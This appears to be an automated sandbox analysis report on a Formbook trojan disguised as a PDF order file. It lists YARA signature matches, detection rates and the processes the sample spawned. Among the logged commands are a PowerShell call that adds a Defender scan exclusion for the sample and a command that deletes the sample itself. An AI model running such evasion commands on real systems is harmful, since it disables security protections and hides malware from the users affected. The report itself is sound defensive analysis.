          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A26BD78_2_04A26BD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2AB408_2_04A2AB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2F43F8_2_04A2F43F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049614608_2_04961460
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A0D5B08_2_04A0D5B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A395C38_2_04A395C3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A275718_2_04A27571
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A216CC8_2_04A216CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049B56308_2_049B5630
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2F7B08_2_04A2F7B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2F0E08_2_04A2F0E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A270E98_2_04A270E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049770C08_2_049770C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A1F0CC8_2_04A1F0CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0497B1B08_2_0497B1B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A3B16B8_2_04A3B16B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0495F1728_2_0495F172
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A516C8_2_049A516C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049752A08_2_049752A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A112ED8_2_04A112ED
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0498B2C08_2_0498B2C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049B739A8_2_049B739A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2132D8_2_04A2132D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0495D34C8_2_0495D34C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2FCF28_2_04A2FCF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049E9C328_2_049E9C32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0498FDC08_2_0498FDC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A27D738_2_04A27D73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04973D408_2_04973D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A21D5A8_2_04A21D5A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04979EB08_2_04979EB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04971F928_2_04971F92
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2FFB18_2_04A2FFB1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04933FD28_2_04933FD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04933FD58_2_04933FD5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2FF098_2_04A2FF09
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049738E08_2_049738E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049DD8008_2_049DD800
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A059108_2_04A05910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049799508_2_04979950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0498B9508_2_0498B950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A11AA38_2_04A11AA3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A0DAAC8_2_04A0DAAC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049B5AA08_2_049B5AA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A1DAC68_2_04A1DAC6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A27A468_2_04A27A46
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2FA498_2_04A2FA49
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049E3A6C8_2_049E3A6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0498FB808_2_0498FB80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049ADBF98_2_049ADBF9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049E5BF08_2_049E5BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2FB768_2_04A2FB76
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD5938_2_007AD593
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD5968_2_007AD596
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AEC618_2_007AEC61
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00792D908_2_00792D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00792D898_2_00792D89
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00799E508_2_00799E50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00792FB08_2_00792FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047AA0368_2_047AA036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A2D028_2_047A2D02
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047AE5CD8_2_047AE5CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A10828_2_047A1082
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A89128_2_047A8912
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047AB2328_2_047AB232
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A5B328_2_047A5B32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A5B308_2_047A5B30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0495B970 appears 280 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 049B7E54 appears 111 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 049DEA12 appears 86 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 049A5130 appears 58 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 049EF290 appears 105 times
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: String function: 011BEA12 appears 86 times
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: String function: 01197E54 appears 102 times
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: String function: 0113B970 appears 280 times
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: String function: 011CF290 appears 105 times
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: String function: 01185130 appears 58 times
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2121545176.000000000108E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000000.2079594023.00000000009D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNgWS.exeL vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2130650225.0000000007680000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.000000000123D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010DC000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exeBinary or memory string: OriginalFilenameNgWS.exeL vs ORDER_1105-19-24-3537.pdf.exe
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 1576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, KmBHChENhiSgkuxeS2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, KmBHChENhiSgkuxeS2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, KmBHChENhiSgkuxeS2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.csSecurity API names: _0020.AddAccessRule
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/6@11/4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A03C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,8_2_00A03C66
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A0205A CoCreateInstance,8_2_00A0205A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER_1105-19-24-3537.pdf.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\zxEnLL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mluqbrvl.cef.ps1Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCommand line argument: WLDP.DLL8_2_00A04136
          Source: C:\Windows\SysWOW64\rundll32.exeCommand line argument: localserver8_2_00A04136
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: ORDER_1105-19-24-3537.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: ORDER_1105-19-24-3537.pdf.exeReversingLabs: Detection: 68%
          Source: ORDER_1105-19-24-3537.pdf.exeVirustotal: Detection: 70%
          Source: unknownProcess created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: gpapi.dllJump to behavior
